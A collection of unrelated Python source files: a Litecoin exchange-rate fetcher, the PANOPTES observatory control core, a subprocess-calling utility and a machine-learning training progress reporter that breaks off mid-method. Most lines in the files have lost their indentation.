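    print(ChatCommand.remove_incomplete_sentence(None, '夜正长,路也正长,我们忘却了'))  # -> '夜正长,路也正长,'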
|
exchange_rate.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from datetime import datetime
import inspect
import requests
import sys
from threading import Thread
import time
import traceback
import csv
from decimal import Decimal
from .bitcoin import COIN
from .i18n import _
from .util import PrintError, ThreadJob
from .util import format_satoshis
# See https://en.wikipedia.org/wiki/ISO_4217
CCY_PRECISIONS = {'BHD': 3, 'BIF': 0, 'BYR': 0, 'CLF': 4, 'CLP': 0,
'CVE': 0, 'DJF': 0, 'GNF': 0, 'IQD': 3, 'ISK': 0,
'JOD': 3, 'JPY': 0, 'KMF': 0, 'KRW': 0, 'KWD': 3,
'LYD': 3, 'MGA': 1, 'MRO': 1, 'OMR': 3, 'PYG': 0,
'RWF': 0, 'TND': 3, 'UGX': 0, 'UYI': 0, 'VND': 0,
'VUV': 0, 'XAF': 0, 'XAU': 4, 'XOF': 0, 'XPF': 0}
class ExchangeBase(PrintError):
def __init__(self, on_quotes, on_history):
self.history = {}
self.quotes = {}
self.on_quotes = on_quotes
self.on_history = on_history
def get_json(self, site, get_string):
# APIs must have https
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electrum'})
return response.json()
def get_csv(self, site, get_string):
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electrum'})
reader = csv.DictReader(response.content.decode().split('\n'))
return list(reader)
def name(self):
return self.__class__.__name__
def update_safe(self, ccy):
try:
self.print_error("getting fx quotes for", ccy)
self.quotes = self.get_rates(ccy)
self.print_error("received fx quotes")
except BaseException as e:
self.print_error("failed fx quotes:", e)
self.on_quotes()
def update(self, ccy):
t = Thread(target=self.update_safe, args=(ccy,))
        t.daemon = True
t.start()
def get_historical_rates_safe(self, ccy):
try:
self.print_error("requesting fx history for", ccy)
self.history[ccy] = self.historical_rates(ccy)
self.print_error("received fx history for", ccy)
self.on_history()
except BaseException as e:
self.print_error("failed fx history:", e)
def get_historical_rates(self, ccy):
result = self.history.get(ccy)
if not result and ccy in self.history_ccys():
t = Thread(target=self.get_historical_rates_safe, args=(ccy,))
            t.daemon = True
t.start()
return result
def history_ccys(self):
return []
def historical_rate(self, ccy, d_t):
return self.history.get(ccy, {}).get(d_t.strftime('%Y-%m-%d'))
def get_currencies(self):
rates = self.get_rates('')
return sorted([str(a) for (a, b) in rates.items() if b is not None and len(a)==3])
class Bit2C(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.bit2c.co.il', '/Exchanges/LTCNIS/Ticker.json')
return {'NIS': Decimal(json['ll'])}
class BitcoinAverage(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('apiv2.bitcoinaverage.com', '/indices/global/ticker/short')
return dict([(r.replace("LTC", ""), Decimal(json[r]['last']))
for r in json if r != 'timestamp'])
def history_ccys(self):
return ['AUD', 'BRL', 'CAD', 'CHF', 'CNY', 'EUR', 'GBP', 'IDR', 'ILS',
'MXN', 'NOK', 'NZD', 'PLN', 'RON', 'RUB', 'SEK', 'SGD', 'USD',
'ZAR']
def historical_rates(self, ccy):
history = self.get_csv('apiv2.bitcoinaverage.com',
"/indices/global/history/LTC%s?period=alltime&format=csv" % ccy)
return dict([(h['DateTime'][:10], h['Average'])
for h in history])
class BitcoinVenezuela(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitcoinvenezuela.com', '/')
rates = [(r, json['LTC'][r]) for r in json['LTC']
if json['LTC'][r] is not None] # Giving NULL sometimes
return dict(rates)
def history_ccys(self):
return ['ARS', 'EUR', 'USD', 'VEF']
def historical_rates(self, ccy):
return self.get_json('api.bitcoinvenezuela.com',
"/historical/index.php?coin=LTC")[ccy +'_LTC']
class Bitfinex(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitfinex.com', '/v1/pubticker/ltcusd')
return {'USD': Decimal(json['last_price'])}
class BitStamp(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.bitstamp.net', '/api/v2/ticker/ltcusd/')
return {'USD': Decimal(json['last'])}
class BTCChina(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('data.btcchina.com', '/data/ticker?market=ltccny')
return {'CNY': Decimal(json['ticker']['last'])}
class CaVirtEx(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.cavirtex.com', '/api2/ticker.json?currencypair=LTCCAD')
return {'CAD': Decimal(json['ticker']['LTCCAD']['last'])}
class CoinSpot(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.coinspot.com.au', '/pubapi/latest')
return {'AUD': Decimal(json['prices']['ltc']['last'])}
class GoCoin(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('x.g0cn.com', '/prices')
ltc_prices = json['prices']['LTC']
return dict([(r, Decimal(ltc_prices[r])) for r in ltc_prices])
class HitBTC(ExchangeBase):
def get_rates(self, ccy):
ccys = ['EUR', 'USD']
json = self.get_json('api.hitbtc.com', '/api/1/public/LTC%s/ticker' % ccy)
result = dict.fromkeys(ccys)
if ccy in ccys:
result[ccy] = Decimal(json['last'])
return result
class Kraken(ExchangeBase):
def get_rates(self, ccy):
dicts = self.get_json('api.kraken.com', '/0/public/AssetPairs')
pairs = [k for k in dicts['result'] if k.startswith('XLTCZ')]
json = self.get_json('api.kraken.com',
'/0/public/Ticker?pair=%s' % ','.join(pairs))
ccys = [p[5:] for p in pairs]
result = dict.fromkeys(ccys)
result[ccy] = Decimal(json['result']['XLTCZ'+ccy]['c'][0])
return result
def history_ccys(self):
return ['EUR', 'USD']
def historical_rates(self, ccy):
query = '/0/public/OHLC?pair=LTC%s&interval=1440' % ccy
json = self.get_json('api.kraken.com', query)
history = json['result']['XLTCZ'+ccy]
return dict([(time.strftime('%Y-%m-%d', time.localtime(t[0])), t[4])
for t in history])
class OKCoin(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.okcoin.cn', '/api/ticker.do?symbol=ltc_cny')
return {'CNY': Decimal(json['ticker']['last'])}
class MercadoBitcoin(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('mercadobitcoin.net',
"/api/v2/ticker_litecoin")
return {'BRL': Decimal(json['ticker']['last'])}
class WEX(ExchangeBase):
def get_rates(self, ccy):
json_eur = self.get_json('wex.nz', '/api/3/ticker/ltc_eur')
json_rub = self.get_json('wex.nz', '/api/3/ticker/ltc_rur')
json_usd = self.get_json('wex.nz', '/api/3/ticker/ltc_usd')
return {'EUR': Decimal(json_eur['ltc_eur']['last']),
'RUB': Decimal(json_rub['ltc_rur']['last']),
'USD': Decimal(json_usd['ltc_usd']['last'])}
class Bitcointoyou(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('bitcointoyou.com',
"/API/ticker_litecoin.aspx")
return {'BRL': Decimal(json['ticker']['last'])}
def dictinvert(d):
inv = {}
for k, vlist in d.items():
for v in vlist:
keys = inv.setdefault(v, [])
keys.append(k)
return inv
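# For example, dictinvert({'Kraken': ['EUR', 'USD'], 'Bitfinex': ['USD']}) returns
# {'EUR': ['Kraken'], 'USD': ['Kraken', 'Bitfinex']} -- i.e. it maps each currency to
# the exchanges that quote it.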
def get_exchanges_and_currencies():
    import os, json
    path = os.path.join(os.path.dirname(__file__), 'currencies.json')
    try:
        # Use the cached currency list if it has already been written.
        with open(path, 'r') as f:
            return json.loads(f.read())
    except:
        pass
    # Otherwise query every exchange class defined in this module and cache the result.
    d = {}
    is_exchange = lambda obj: (inspect.isclass(obj)
                               and issubclass(obj, ExchangeBase)
                               and obj != ExchangeBase)
    exchanges = dict(inspect.getmembers(sys.modules[__name__], is_exchange))
    for name, klass in exchanges.items():
        exchange = klass(None, None)
        try:
            d[name] = exchange.get_currencies()
        except:
            continue
    with open(path, 'w') as f:
        f.write(json.dumps(d, indent=4, sort_keys=True))
    return d
CURRENCIES = get_exchanges_and_currencies()
def get_exchanges_by_ccy(history=True):
if not history:
return dictinvert(CURRENCIES)
d = {}
exchanges = CURRENCIES.keys()
for name in exchanges:
klass = globals()[name]
exchange = klass(None, None)
d[name] = exchange.history_ccys()
return dictinvert(d)
class FxThread(ThreadJob):
def __init__(self, config, network):
self.config = config
self.network = network
self.ccy = self.get_currency()
self.history_used_spot = False
self.ccy_combo = None
self.hist_checkbox = None
self.set_exchange(self.config_exchange())
def get_currencies(self, h):
d = get_exchanges_by_ccy(h)
return sorted(d.keys())
def get_exchanges_by_ccy(self, ccy, h):
d = get_exchanges_by_ccy(h)
return d.get(ccy, [])
def ccy_amount_str(self, amount, commas):
prec = CCY_PRECISIONS.get(self.ccy, 2)
fmt_str = "{:%s.%df}" % ("," if commas else "", max(0, prec))
return fmt_str.format(round(amount, prec))
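        # e.g. for 'JPY' (precision 0) with commas=True the format string is "{:,.0f}",
        # so ccy_amount_str(1234.5, True) -> '1,234'; a default 2-decimal currency would
        # use "{:,.2f}" and give '1,234.50'.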
def run(self):
# This runs from the plugins thread which catches exceptions
if self.is_enabled():
if self.timeout ==0 and self.show_history():
self.exchange.get_historical_rates(self.ccy)
if self.timeout <= time.time():
self.timeout = time.time() + 150
self.exchange.update(self.ccy)
def is_enabled(self):
return bool(self.config.get('use_exchange_rate'))
def set_enabled(self, b):
return self.config.set_key('use_exchange_rate', bool(b))
def get_history_config(self):
return bool(self.config.get('history_rates'))
def set_history_config(self, b):
self.config.set_key('history_rates', bool(b))
def get_fiat_address_config(self):
return bool(self.config.get('fiat_address'))
def set_fiat_address_config(self, b):
self.config.set_key('fiat_address', bool(b))
def get_currency(self):
'''Use when dynamic fetching is needed'''
return self.config.get("currency", "EUR")
def config_exchange(self):
return self.config.get('use_exchange', 'BitcoinAverage')
def show_history(self):
return self.is_enabled() and self.get_history_config() and self.ccy in self.exchange.history_ccys()
def set_currency(self, ccy):
self.ccy = ccy
self.config.set_key('currency', ccy, True)
self.timeout = 0 # Because self.ccy changes
self.on_quotes()
def set_exchange(self, name):
class_ = globals().get(name, BitcoinAverage)
self.print_error("using exchange", name)
if self.config_exchange() != name:
self.config.set_key('use_exchange', name, True)
self.exchange = class_(self.on_quotes, self.on_history)
# A new exchange means new fx quotes, initially empty. Force
# a quote refresh
self.timeout = 0
def on_quotes(self):
self.network.trigger_callback('on_quotes')
def on_history(self):
self.network.trigger_callback('on_history')
def exchange_rate(self):
'''Returns None, or the exchange rate as a Decimal'''
rate = self.exchange.quotes.get(self.ccy)
if rate:
return Decimal(rate)
def format_amount_and_units(self, btc_balance):
rate = self.exchange_rate()
return '' if rate is None else "%s %s" % (self.value_str(btc_balance, rate), self.ccy)
def get_fiat_status_text(self, btc_balance, base_unit, decimal_point):
rate = self.exchange_rate()
return _(" (No FX rate available)") if rate is None else " 1 %s~%s %s" % (base_unit,
self.value_str(COIN / (10**(8 - decimal_point)), rate), self.ccy)
def value_str(self, satoshis, rate):
if satoshis is None: # Can happen with incomplete history
return _("Unknown")
if rate:
value = Decimal(satoshis) / COIN * Decimal(rate)
return "%s" % (self.ccy_amount_str(value, True))
return _("No data")
def history_rate(self, d_t):
rate = self.exchange.historical_rate(self.ccy, d_t)
# Frequently there is no rate for today, until tomorrow :)
# Use spot quotes in that case
if rate is None and (datetime.today().date() - d_t.date()).days <= 2:
rate = self.exchange.quotes.get(self.ccy)
self.history_used_spot = True
return rate
def historical_value_str(self, satoshis, d_t):
rate = self.history_rate(d_t)
return self.value_str(satoshis, rate)
|
core.py
|
import queue
import time
import zmq
from multiprocessing import Process
from multiprocessing import Queue
from astropy import units as u
from . import PanBase
from .observatory import Observatory
from .state.machine import PanStateMachine
from .utils import current_time
from .utils import get_free_space
from .utils.messaging import PanMessaging
class POCS(PanStateMachine, PanBase):
"""The main class representing the Panoptes Observatory Control Software (POCS).
Interaction with a PANOPTES unit is done through instances of this class. An instance consists
primarily of an `Observatory` object, which contains the mount, cameras, scheduler, etc.
See `pocs.Observatory`. The instance itself is designed to be run as a state machine with
the `get_ready()` method the transition that is responsible for moving to the initial state.
Args:
state_machine_file(str): Filename of the state machine to use, defaults to 'simple_state_table'
messaging(bool): If messaging should be included, defaults to False
simulator(list): A list of the different modules that can run in simulator mode. Possible
modules include: all, mount, camera, weather, night. Defaults to an empty list.
Attributes:
name (str): Name of PANOPTES unit
next_state (str): The next state for the state machine
observatory (`pocs.observatory.Observatory`): The `~pocs.observatory.Observatory` object
"""
def __init__(self, state_machine_file='simple_state_table', messaging=False, **kwargs):
# Explicitly call the base classes in the order we want
PanBase.__init__(self, **kwargs)
self.logger.info('Initializing PANOPTES unit')
self._processes = {}
self._has_messaging = None
self.has_messaging = messaging
self._sleep_delay = kwargs.get('sleep_delay', 2.5) # Loop delay
self._safe_delay = kwargs.get('safe_delay', 60 * 5) # Safety check delay
self._is_safe = False
PanStateMachine.__init__(self, state_machine_file, **kwargs)
# Create our observatory, which does the bulk of the work
self.observatory = Observatory(**kwargs)
self._connected = True
self._initialized = False
self._interrupted = False
self.force_reschedule = False
self.status()
self.name = self.config.get('name', 'Generic PANOPTES Unit')
self.logger.info('Welcome {}!'.format(self.name))
self.say("Hi there!")
@property
def is_initialized(self):
""" Indicates if POCS has been initalized or not """
return self._initialized
@property
def interrupted(self):
"""If POCS has been interrupted
Returns:
bool: If an interrupt signal has been received
"""
return self._interrupted
@property
def connected(self):
""" Indicates if POCS is connected """
return self._connected
@property
def has_messaging(self):
return self._has_messaging
@has_messaging.setter
def has_messaging(self, value):
self._has_messaging = value
if self._has_messaging:
self._setup_messaging()
##################################################################################################
# Methods
##################################################################################################
def initialize(self):
""" """
if not self._initialized:
self.say("Initializing the system! Woohoo!")
try:
# Initialize the mount
self.logger.debug("Initializing mount")
self.observatory.mount.initialize()
except Exception as e:
self.say("Oh wait. There was a problem initializing: {}".format(e))
self.say("Since we didn't initialize, I'm going to exit.")
self.power_down()
else:
self._initialized = True
self.status()
return self._initialized
def status(self):
status = dict()
try:
status['state'] = self.state
status['system'] = {
'free_space': get_free_space().value,
}
status['observatory'] = self.observatory.status()
except Exception as e: # pragma: no cover
self.logger.warning("Can't get status: {}".format(e))
else:
self.send_message(status, channel='STATUS')
return status
def say(self, msg):
""" PANOPTES Units like to talk!
Send a message. Message sent out through zmq has unit name as channel.
Args:
msg(str): Message to be sent
"""
self.send_message(msg, channel='PANCHAT')
def send_message(self, msg, channel='POCS'):
""" Send a message
This will use the `self._msg_publisher` to send a message
Note:
The `channel` and `msg` params are switched for convenience
Arguments:
msg {str} -- Message to be sent
Keyword Arguments:
channel {str} -- Channel to send message on (default: {'POCS'})
"""
if self.has_messaging:
self._msg_publisher.send_message(channel, msg)
def check_messages(self):
""" Check messages for the system
        If `self.has_messaging` is True then there is a separate process running
responsible for checking incoming zeromq messages. That process will fill
various `queue.Queue`s with messages depending on their type. This method
is a thin-wrapper around private methods that are responsible for message
dispatching based on which queue received a message.
"""
if self.has_messaging:
self._check_messages('command', self._cmd_queue)
self._check_messages('schedule', self._sched_queue)
def power_down(self):
"""Actions to be performed upon shutdown
Note:
This method is automatically called from the interrupt handler. The definition should
include what you want to happen upon shutdown but you don't need to worry about calling
it manually.
"""
if self.connected:
self.say("I'm powering down")
self.logger.info("Shutting down {}, please be patient and allow for exit.".format(self.name))
# Park if needed
if self.state not in ['parking', 'parked', 'sleeping', 'housekeeping']:
if self.observatory.mount.is_connected:
if not self.observatory.mount.is_parked:
self.logger.info("Parking mount")
self.park()
if self.state == 'parking':
if self.observatory.mount.is_connected:
if self.observatory.mount.is_parked:
self.logger.info("Mount is parked, setting Parked state")
self.set_park()
if not self.observatory.mount.is_parked:
self.logger.info('Mount not parked, parking')
self.observatory.mount.park()
# Observatory shut down
self.observatory.power_down()
# Shut down messaging
self.logger.debug('Shutting down messaging system')
for name, proc in self._processes.items():
if proc.is_alive():
self.logger.debug('Terminating {} - PID {}'.format(name, proc.pid))
proc.terminate()
self._keep_running = False
self._do_states = False
self._connected = False
self.logger.info("Power down complete")
##################################################################################################
# Safety Methods
##################################################################################################
def is_safe(self):
"""Checks the safety flag of the system to determine if safe.
This will check the weather station as well as various other environmental
aspects of the system in order to determine if conditions are safe for operation.
Note:
This condition is called by the state machine during each transition
Args:
called from the state machine.
Returns:
bool: Latest safety flag
Deleted Parameters:
event_data(transitions.EventData): carries information about the event if
"""
is_safe_values = dict()
# Check if night time
is_safe_values['is_dark'] = self.is_dark()
# Check weather
is_safe_values['good_weather'] = self.is_weather_safe()
is_safe_values['free_space'] = self.has_free_space()
safe = all(is_safe_values.values())
if not safe:
self.logger.warning('Unsafe conditions: {}'.format(is_safe_values))
# Not safe so park unless we are not active
if self.state not in ['sleeping', 'parked', 'parking', 'housekeeping', 'ready']:
self.logger.warning('Safety failed so sending to park')
self.park()
return safe
def is_dark(self):
"""Is it dark
Checks whether it is dark at the location provided. This checks for the config
entry `location.horizon` or 18 degrees (astronomical twilight).
Returns:
bool: Is night at location
"""
if 'night' in self.config['simulator']:
self.logger.debug("Night simulator says safe")
is_dark = True
else:
is_dark = self.observatory.is_dark
self.logger.debug("Dark Check: {}".format(is_dark))
return is_dark
def is_weather_safe(self, stale=180):
"""Determines whether current weather conditions are safe or not
Args:
stale (int, optional): Number of seconds before record is stale, defaults to 180
Returns:
bool: Conditions are safe (True) or unsafe (False)
"""
assert self.db.current, self.logger.warning("No connection to sensors, can't check weather safety")
# Always assume False
is_safe = False
record = {'safe': False}
if 'weather' in self.config['simulator']:
self.logger.debug("Weather simulator always safe")
is_safe = True
else:
try:
record = self.db.current.find_one({'type': 'weather'})
is_safe = record['data'].get('safe', False)
timestamp = record['date']
age = (current_time().datetime - timestamp).total_seconds()
self.logger.debug("Weather Safety: {} [{:.0f} sec old - {}]".format(is_safe, age, timestamp))
except TypeError as e:
self.logger.warning("No record found in Mongo DB")
self.logger.debug('DB: {}'.format(self.db.current))
else:
if age > stale:
self.logger.warning("Weather record looks stale, marking unsafe.")
is_safe = False
self._is_safe = is_safe
return self._is_safe
def has_free_space(self, required_space=0.25 * u.gigabyte):
"""Does hard drive have disk space (>= 0.5 GB)
Args:
required_space (u.gigabyte, optional): Amount of free space required
for operation
Returns:
bool: True if enough space
"""
free_space = get_free_space()
return free_space.value >= required_space.to(u.gigabyte).value
##################################################################################################
# Convenience Methods
##################################################################################################
def sleep(self, delay=2.5, with_status=True):
""" Send POCS to sleep
Loops for `delay` number of seconds. If `delay` is more than 10.0 seconds,
`check_messages` will be called every 10.0 seconds in order to allow for
interrupt.
Keyword Arguments:
delay {float} -- Number of seconds to sleep (default: 2.5)
with_status {bool} -- Show system status while sleeping (default: {True if delay > 2.0})
"""
if delay is None:
delay = self._sleep_delay
if with_status and delay > 2.0:
self.status()
# If delay is greater than 10 seconds check for messages during wait
if delay >= 10.0:
while delay >= 10.0:
time.sleep(10.0)
delay -= 10.0
self.check_messages()
if delay > 0.0:
time.sleep(delay)
def wait_until_safe(self):
""" Waits until weather is safe
This will wait until a True value is returned from the safety check,
blocking until then.
"""
while not self.is_safe():
self.sleep(delay=self._safe_delay)
##################################################################################################
# Private Methods
##################################################################################################
def _check_messages(self, queue_type, q):
cmd_dispatch = {
'command': {
'park': self._interrupt_and_park,
'shutdown': self._interrupt_and_shutdown,
},
'schedule': {}
}
while True:
try:
msg_obj = q.get_nowait()
call_method = msg_obj.get('message', '')
# Lookup and call the method
self.logger.info('Message received: {} {}'.format(queue_type, call_method))
cmd_dispatch[queue_type][call_method]()
except queue.Empty:
break
except KeyError:
pass
except Exception as e:
self.logger.warning('Problem calling method from messaging: {}'.format(e))
else:
break
def _interrupt_and_park(self):
self.logger.info('Park interrupt received')
self._interrupted = True
self.park()
def _interrupt_and_shutdown(self):
self.logger.warning('Shutdown command received')
self._interrupted = True
self.power_down()
def _setup_messaging(self):
cmd_port = self.config['messaging']['cmd_port']
msg_port = self.config['messaging']['msg_port']
def create_forwarder(port):
PanMessaging.create_forwarder(port, port + 1)
cmd_forwarder_process = Process(target=create_forwarder, args=(cmd_port,), name='CmdForwarder')
cmd_forwarder_process.start()
msg_forwarder_process = Process(target=create_forwarder, args=(msg_port,), name='MsgForwarder')
msg_forwarder_process.start()
self._do_cmd_check = True
self._cmd_queue = Queue()
self._sched_queue = Queue()
self._msg_publisher = PanMessaging.create_publisher(msg_port)
def check_message_loop(cmd_queue):
cmd_subscriber = PanMessaging.create_subscriber(cmd_port + 1)
poller = zmq.Poller()
poller.register(cmd_subscriber.socket, zmq.POLLIN)
try:
while self._do_cmd_check:
# Poll for messages
sockets = dict(poller.poll(500)) # 500 ms timeout
if cmd_subscriber.socket in sockets and sockets[cmd_subscriber.socket] == zmq.POLLIN:
msg_type, msg_obj = cmd_subscriber.receive_message(flags=zmq.NOBLOCK)
# Put the message in a queue to be processed
if msg_type == 'POCS-CMD':
cmd_queue.put(msg_obj)
time.sleep(1)
except KeyboardInterrupt:
pass
self.logger.debug('Starting command message loop')
check_messages_process = Process(target=check_message_loop, args=(self._cmd_queue,))
check_messages_process.name = 'MessageCheckLoop'
check_messages_process.start()
self.logger.debug('Command message subscriber set up on port {}'.format(cmd_port))
self._processes = {
'check_messages': check_messages_process,
'cmd_forwarder': cmd_forwarder_process,
'msg_forwarder': msg_forwarder_process,
}
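    # Topology note (derived from the calls above): each forwarder bridges port N, where
    # publishers connect, to port N + 1, where subscribers connect. Commands therefore
    # arrive on cmd_port and are read by check_message_loop on cmd_port + 1, while this
    # process publishes its own status/chat messages on msg_port.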
|
wrap_cmd_call.py
|
import logging
import subprocess
from enum import Enum
from subprocess import Popen, PIPE
from queue import Queue
from threading import Thread
from typing import List, Optional, Callable
from klgists import logger
from klgists.common.exceptions import ExternalCommandFailed
class PipeType(Enum):
STDOUT = 1
STDERR = 2
def _disp(out, ell, name):
    # 'out' can be None if the process was killed before communicate() returned anything.
    out = (out or '').strip()
    if '\n' in out:
        ell(name + ":\n<<=====\n" + out + '\n=====>>')
    elif len(out) > 0:
        ell(name + ": <<===== " + out + " =====>>")
    else:
        ell(name + ": <no output>")
def _log(out, err, ell):
_disp(out, ell, "stdout")
_disp(err, ell, "stderr")
def smart_log_callback(source, line, prefix: str = '') -> None:
line = line.decode('utf-8')
if line.startswith('FATAL:'):
logger.fatal(prefix + line)
elif line.startswith('ERROR:'):
logger.error(prefix + line)
elif line.startswith('WARNING:'):
logger.warning(prefix + line)
elif line.startswith('INFO:'):
logger.info(prefix + line)
elif line.startswith('DEBUG:'):
logger.debug(prefix + line)
else:
logger.debug(prefix + line)
def _reader(pipe_type, pipe, queue):
try:
with pipe:
for line in iter(pipe.readline, b''):
queue.put((pipe_type, line))
finally:
queue.put(None)
def stream_cmd_call(cmd: List[str], stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell_cmd: str=None, cwd: Optional[str] = None, timeout_secs: Optional[float] = None, log_callback: Callable[[PipeType, bytes], None] = None, bufsize: int = 1) -> None:
"""Calls an external command, waits, and throws a ExternalCommandFailed for nonzero exit codes.
Returns (stdout, stderr).
The user can optionally provide a shell to run the command with, e.g. "powershell.exe"
"""
if log_callback is None:
log_callback = smart_log_callback
cmd = [str(p) for p in cmd]
if shell_cmd:
cmd = [shell_cmd] + cmd
logger.debug("Streaming '{}'".format(' '.join(cmd)))
p = subprocess.Popen(cmd, stdout=PIPE, stderr=PIPE, cwd=cwd, bufsize=bufsize)
try:
q = Queue()
Thread(target=_reader, args=[PipeType.STDOUT, p.stdout, q]).start()
Thread(target=_reader, args=[PipeType.STDERR, p.stderr, q]).start()
for _ in range(2):
for source, line in iter(q.get, None):
log_callback(source, line)
exit_code = p.wait(timeout=timeout_secs)
finally:
p.kill()
if exit_code != 0:
raise ExternalCommandFailed("Got nonzero exit code {} from '{}'".format(exit_code, ' '.join(cmd)), cmd, exit_code, '<<unknown>>', '<<unknown>>')
def wrap_cmd_call(cmd: List[str], stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell_cmd: str=None, cwd: Optional[str] = None, timeout_secs: Optional[float] = None) -> (str, str):
"""Calls an external command, waits, and throws a ExternalCommandFailed for nonzero exit codes.
Returns (stdout, stderr).
The user can optionally provide a shell to run the command with, e.g. "powershell.exe"
"""
cmd = [str(p) for p in cmd]
if shell_cmd:
cmd = [shell_cmd] + cmd
logger.debug("Calling '{}'".format(' '.join(cmd)))
p = subprocess.Popen(cmd, stdout=stdout, stderr=stderr, cwd=cwd)
out, err, exit_code = None, None, None
try:
(out, err) = p.communicate(timeout=timeout_secs)
out = out.decode('utf-8')
err = err.decode('utf-8')
exit_code = p.wait(timeout=timeout_secs)
except Exception as e:
_log(out, err, logger.warning)
raise e
finally:
p.kill()
if exit_code != 0:
_log(out, err, logger.warning)
raise ExternalCommandFailed("Got nonzero exit code {} from '{}'".format(exit_code, ' '.join(cmd)), cmd, exit_code, out, err)
_log(out, err, logger.debug)
return out, err
__all__ = ['wrap_cmd_call', 'stream_cmd_call']
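if __name__ == '__main__':
    # Hedged smoke test: assumes a POSIX-style `echo` on PATH and that the klgists
    # imports at the top of this module resolve. wrap_cmd_call returns the decoded
    # (stdout, stderr) pair and raises ExternalCommandFailed on a nonzero exit code.
    out, err = wrap_cmd_call(['echo', 'hello world'])
    print('stdout:', out.strip())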
|
reporter.py
|
# -*- coding:utf-8 -*-
# Copyright xmuspeech (Author: Snowdar 2020-02-09)
import os, sys
import time
import shutil
import logging
import progressbar
import traceback
import pandas as pd
from multiprocessing import Process, Queue
import libs.support.utils as utils
# Logger
logger = logging.getLogger(__name__)
logger.addHandler(logging.NullHandler())
class Reporter():
def __init__(self, trainer):
default_params = {
"report_times_every_epoch": None,
"report_interval_iters": 100,
"record_file": "train.csv",
"use_tensorboard": False
}
self.trainer = trainer
default_params = utils.assign_params_dict(default_params, self.trainer.params)
if default_params["report_times_every_epoch"] is not None:
self.report_interval_iters = max(1, self.trainer.training_point[2] // default_params["report_times_every_epoch"])
else:
self.report_interval_iters = default_params["report_interval_iters"]
if not self.trainer.params["debug"] and default_params["use_tensorboard"]:
# from tensorboardX import SummaryWriter
from torch.utils.tensorboard import SummaryWriter
model_name = os.path.basename(self.trainer.params["model_dir"])
# time_string = time.strftime('%Y-%m-%d-%H-%M-%S', time.localtime(time.time()))
# time_string = self.trainer.params["time_string"]
# self.board_writer = SummaryWriter("{}/log/{}-{}-tensorboard".format(self.trainer.params["model_dir"], model_name, time_string))
# self.board_writer = SummaryWriter("{}/log/{}-{}-tensorboard".format(
# self.trainer.params["model_dir"], time_string, model_name))
self.board_writer = SummaryWriter("{}/log/tensorboard".format(self.trainer.params["model_dir"]))
else:
self.board_writer = None
self.epochs = self.trainer.params["epochs"]
self.optimizer = self.trainer.elements["optimizer"]
# For optimizer wrapper such as lookahead.
# "None" is the default value
if getattr(self.optimizer, "optimizer", None) is not None:
self.optimizer = self.optimizer.optimizer
self.device = "[{0}]".format(utils.get_device(self.trainer.elements["model"]))
self.record_value = []
self.start_write_log = False
if not self.trainer.params["debug"] and default_params["record_file"] != "" and default_params["record_file"] is not None:
self.record_file = "{0}/log/{1}".format(self.trainer.params["model_dir"], default_params["record_file"])
# The case to recover training
if self.trainer.params["start_epoch"] > 0:
# train.csv using append mode
self.start_write_log = True
elif os.path.exists(self.record_file):
# Do backup to avoid clearing the loss log when re-running a same launcher.
bk_file = "{0}.backup.{1}".format(
self.record_file, time.strftime('%Y-%m-%d_%H:%M:%S', time.localtime(time.time())))
shutil.move(self.record_file, bk_file)
else:
self.record_file = None
# A format to show progress
# Do not use progressbar.Bar(marker="\x1b[32m█\x1b[39m") and progressbar.SimpleProgress(format='%(value_s)s/%(max_value_s)s') to avoid too long string.
widgets = [progressbar.Percentage(format='%(percentage)3.2f%%'), " | ",
"Epoch:", progressbar.Variable('current_epoch', format='{formatted_value}', width=0, precision=0), "/{0}, ".format(self.epochs),
"Iter:", progressbar.Variable('current_iter', format='{formatted_value}', width=0, precision=0), "/{0}".format(self.trainer.training_point[2]),
" (", progressbar.Timer(format='ELA: %(elapsed)s'), ", ", progressbar.AdaptiveETA(), ")"]
# total num of iter
max_value = self.trainer.params["epochs"] * self.trainer.training_point[2]
self.bar = progressbar.ProgressBar(max_value=max_value, widgets=widgets, redirect_stdout=True)
# Use multi-process for update.
self.queue = Queue()
self.process = Process(target=self._update, daemon=True)
self.process.start()
def is_report(self, training_point):
return (training_point[1] % self.report_interval_iters == 0 or
training_point[1] + 1 == training_point[2])
def record(self, info_dict, training_point):
if self.record_file is not None:
self.record_value.append(info_dict)
if self.is_report(training_point):
print("Device:{0}, {1}".format(self.device, utils.dict_to_params_str(info_dict, auto=False, sep=", ")))
dataframe = pd.DataFrame(self.record_value)
if self.start_write_log:
dataframe.to_csv(self.record_file, mode='a', header=False, index=False)
else:
# with open(self.record_file, "w") as f:
# f.truncate()
dataframe.to_csv(self.record_file, header=True, index=False)
self.start_write_log = True
self.record_value.clear()
def _update(self):
# Do not use any var which will be updated by main process, such as self.trainer.training_point.
while True:
try:
res = self.queue.get()
if res is None:
self.bar.finish()
break
snapshot, training_point, current_lr = res
current_epoch, current_iter, num_batchs_train = training_point
updated_iters = current_epoch * num_batchs_train + current_iter + 1
self.bar.update(updated_iters, current_epoch=current_epoch + 1, current_iter=current_iter + 1)
real_snapshot = snapshot.pop("real")
if self.board_writer is not None:
self.board_writer.add_scalars("scalar_base", {"epoch": float(current_epoch + 1),
"lr": current_lr}, updated_iters)
loss_dict = {}
acc_dict = {}
for key in real_snapshot.keys():
if "loss" in key:
loss_dict[key] = real_snapshot[key]
elif "acc" in key:
acc_dict[key] = real_snapshot[key]
else:
self.board_writer.add_scalar(key, real_snapshot[key], updated_iters)
self.board_writer.add_scalars("scalar_acc", acc_dict, updated_iters)
self.board_writer.add_scalars("scalar_loss", loss_dict, updated_iters)
